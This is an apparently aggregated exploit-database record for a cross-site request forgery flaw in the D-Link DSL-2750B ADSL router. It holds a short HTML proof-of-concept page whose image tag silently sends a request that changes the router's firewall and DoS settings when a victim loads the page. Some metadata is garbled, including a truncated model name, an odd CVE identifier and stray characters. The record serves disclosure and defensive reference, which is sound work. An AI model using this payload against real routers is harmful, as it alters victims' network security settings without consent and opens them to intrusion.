ID
VAR-E-201402-0152
EDB ID
31569
TITLE
D-Link DSL-2750B ADSL Route' - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
D-Link DSL-2750B ADSL Route' - Cross-Site Request Forgery. CVE-103350 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | dsl-2750b adsl route' | scope: | - | version: | - | Trust: 1.0 |
| vendor: | d link | model: | dsl-2750b adsl router | scope: | - | version: | - | Trust: 0.6 |
EXPLOIT
# Exploit Title : D-Link DSL-2750B (ADSL Router) CSRF Vulnerability
# Date : 10-02-2014
# Author : killall-9@mail.com
# Vendor site : http://www.d-link.com
# Version : DSL-2750B
# Tested on : Firmware Version: EU_2.02; Hardware Version: B1
The D-Link DSL-2750B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters.
POC=>
<html lang="en">
<head>
<title>Pinata-CSRF-poc for D-Link</title>
</head>
<body>
<img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
</body>
</html>
cincin°°°
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.0
CREDITS
killall-9
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 31569 | Trust: 1.6 |
| db: | EDBNET | id: | 57045 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/31569/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 31569 |
| db: | EDBNET | id: | 57045 |
LAST UPDATE DATE
2022-07-27T09:49:45.215000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 31569 | date: | 2014-02-11T00:00:00 |
| db: | EDBNET | id: | 57045 | date: | 2014-02-11T00:00:00 |